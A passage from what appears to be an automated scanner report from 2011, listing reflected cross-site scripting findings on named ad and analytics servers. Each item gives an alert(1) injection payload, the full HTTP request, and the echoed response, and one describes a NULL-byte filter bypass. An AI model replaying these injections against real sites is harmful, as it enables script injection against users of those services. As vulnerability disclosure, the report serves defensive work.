Set-Cookie: u=6|0BEIV%2BNJSAAAAABIBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fnhU7Shw8lB7AAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:06 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=a5798"><script>alert(1)</script>bbf67718b2ehttp://ad.agkn.com/interaction!che=989082879?imid=8670815940544450683&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi
...[SNIP]...

2.13. http://ads.media.net/medianet.php [size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.media.net
Path:   /medianet.php

Issue detail

The value of the size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f42'%3balert(1)//acefc548551 was submitted in the size parameter. This input was echoed as 71f42';alert(1)//acefc548551 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /medianet.php?cid=7CU2PK0I5&size=300x25071f42'%3balert(1)//acefc548551&crid=712228940&ran=0.19952531741000712 HTTP/1.1
Host: ads.media.net
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Content-Length: 6882
Connection: close
Content-Type: text/html; charset=UTF-8

<html><head></head><body style="margin: 0px; padding: 0px;">
<script language="javascript" type="text/javascript">
(function(){ var staticFrameUrl = 'http://srv.cdn-media.net/'; var requrl = '', fd = '', servingURL = 'http://search.keywordblocks.com/cmdynet?', kurl = '', cid = '7CU2PK0I5', size = '300x25071f42';alert(1)//acefc548551', crid = '712228940', widthx = '300', heighty = '25071f42';alert(1)//acefc548551';window._mN={};_mN._util={isAdProviderUrl:function(a){if(a==undefined||a==""){return false}return(_mN._sjc.providers.te
...[SNIP]...

2.14. http://ads.pointroll.com/PortalServe/ [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a17b3"%3balert(1)//1d7d4442f53 was submitted in the r parameter. This input was echoed as a17b3";alert(1)//1d7d4442f53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-5&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&r=0.34970951941795647a17b3"%3balert(1)//1d7d4442f53 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-5&r=0.34970951941795647a17b3";alert(1)//1d7d4442f53&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.15. http://ads.pointroll.com/PortalServe/ [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5d9"-alert(1)-"b85f3aab297 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-5&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$bd5d9"-alert(1)-"b85f3aab297&r=0.34970951941795647 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
99999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$bd5d9"-alert(1)-"b85f3aab297&time=2|12:45|-5&r=0.34970951941795647&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.16. http://ads.pointroll.com/PortalServe/ [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7cb"%3balert(1)//5a34bad3e0 was submitted in the time parameter. This input was echoed as 9d7cb";alert(1)//5a34bad3e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-59d7cb"%3balert(1)//5a34bad3e0&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&r=0.34970951941795647 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
usic/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-59d7cb";alert(1)//5a34bad3e0&r=0.34970951941795647&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.17. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c7a"><script>alert(1)</script>8352cc5bcec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*&a5c7a"><script>alert(1)</script>8352cc5bcec=1 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313290665_68296156_as3105_imp|305#1315313290665_68296156_as3105_imp|374#1315258459362_65704651_as3105_imp|e2366%00%0d%0ae94350cc287#|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|7e97a%00%0d%0a7815b11943f#.|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:10 GMT
Content-Length: 2600

<!DOCTYPE html>
<!-- Impression Id: 1315313290665_68296156_as3105_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...
.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*&a5c7a"><script>alert(1)</script>8352cc5bcec=1http://adserver.teracent.net/tase/redir/1315313290665_68296156_as3105_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0LK1F-qnZuNrkHiIxSRE6EeBUdOlSCybtgzVS3aoQsH8nsP77FPnyfvBBIXH2b3up1DiXXlMDkQQAJEZ1Br4jy5PQgEhUQSyNo
...[SNIP]...

2.18. http://adserver.teracent.net/tase/ad [rcu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the rcu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4ae"><script>alert(1)</script>c6801dc18e5 was submitted in the rcu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*7b4ae"><script>alert(1)</script>c6801dc18e5 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313290345_68345684_as3104_imp|305#1315313290345_68345684_as3104_imp|374#1315258459362_65704651_as3105_imp|f5d4d72fe77543f7c2420cd7#|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|f5d4d72f11f08cc6d748514#.|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:09 GMT
Content-Length: 2576

<!DOCTYPE html>
<!-- Impression Id: 1315313290345_68345684_as3104_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...
6.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*7b4ae"><script>alert(1)</script>c6801dc18e5http://adserver.teracent.net/tase/redir/1315313290345_68345684_as3104_imp?q=H4sIAAAAAAAAAFVQu3LDMAz7FVLWM9XQjZt9XXuJP6GtnOjiUefIqZKLrG_rn5XtdemCAQQBkO_56zl6ENBZoZ0yqA3F6YeQAkRnUShJZf1PjMYxGqfGNAlANZZHo
...[SNIP]...

2.19. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.partners-z.com
Path:   /yre/20100908/b

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 93b5d<script>alert(1)</script>db9aaf04338 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /yre/2010090893b5d<script>alert(1)</script>db9aaf04338/b?uuid=3c7f76504307f88c4e126d344670b7cc&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&price=&lid=2124552455,2125516156,89336147,31505014,72516437,72538384,2125075536,79497737,2125160035,2124842339&p=10010&page=search& HTTP/1.1
Host: beacon.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
X-Cascade: pass
Content-Type: text/plain
Content-Length: 67
Date: Tue, 06 Sep 2011 12:49:57 GMT

Not Found: /yre/2010090893b5d<script>alert(1)</script>db9aaf04338/b

2.20. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.partners-z.com
Path:   /yre/20100908/b

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fb9e5<script>alert(1)</script>37006748ec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /yre/20100908/bfb9e5<script>alert(1)</script>37006748ec?uuid=3c7f76504307f88c4e126d344670b7cc&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&price=&lid=2124552455,2125516156,89336147,31505014,72516437,72538384,2125075536,79497737,2125160035,2124842339&p=10010&page=search& HTTP/1.1
Host: beacon.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
X-Cascade: pass
Content-Type: text/plain
Content-Length: 66
Date: Tue, 06 Sep 2011 12:49:59 GMT

Not Found: /yre/20100908/bfb9e5<script>alert(1)</script>37006748ec

2.21. http://comcast-www.baynote.net/baynote/tags3/guide/results-xsl/comcast-www [elementIds parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comcast-www.baynote.net
Path:   /baynote/tags3/guide/results-xsl/comcast-www

Issue detail

The value of the elementIds request parameter is copied into the HTML document as plain text between tags. The payload %00ee062<script>alert(1)</script>6f2ae7bb9cf was submitted in the elementIds parameter. This input was echoed as ee062<script>alert(1)</script>6f2ae7bb9cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /baynote/tags3/guide/results-xsl/comcast-www?userId=6923713561343025788&customerId=comcast&code=www&id=1&query=xss&url=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&appendParams=&rankParam=&condition=d%26g%26s&elementIds=com_search_rightrail_b%00ee062<script>alert(1)</script>6f2ae7bb9cf&v=1 HTTP/1.1
Host: comcast-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 156
Date: Tue, 06 Sep 2011 12:22:28 GMT


bnTagManager.getTag(1).divId = "com_search_rightrail_b.ee062<script>alert(1)</script>6f2ae7bb9cf";
bnResourceManager.registerResource("GLResults1");

2.22. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comcastresidentialservices.tt.omtrdc.net
Path:   /m2/comcastresidentialservices/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 819af<script>alert(1)</script>f8868cea7a0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/comcastresidentialservices/mbox/standard?mboxHost=sitesearch.comcast.com&mboxSession=1315327839174-766376&mboxPage=1315329733349-634146&mboxCount=1&internalkeyword=xss&mbox=Search_Image_Promos819af<script>alert(1)</script>f8868cea7a0&mboxId=0&mboxTime=1315311733394&mboxURL=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: comcastresidentialservices.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 215
Date: Tue, 06 Sep 2011 12:22:52 GMT
Server: Test & Target

mboxFactories.get('default').get('Search_Image_Promos819af<script>alert(1)</script>f8868cea7a0',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315327839174-766376.19");

2.23. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 18ccf<script>alert(1)</script>aa7f8549978 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D8383746361359954%3F&uid=TVYMYp4lQTRs9JsS_4098672818ccf<script>alert(1)</script>aa7f8549978&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1315331134985-48379358672536910&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
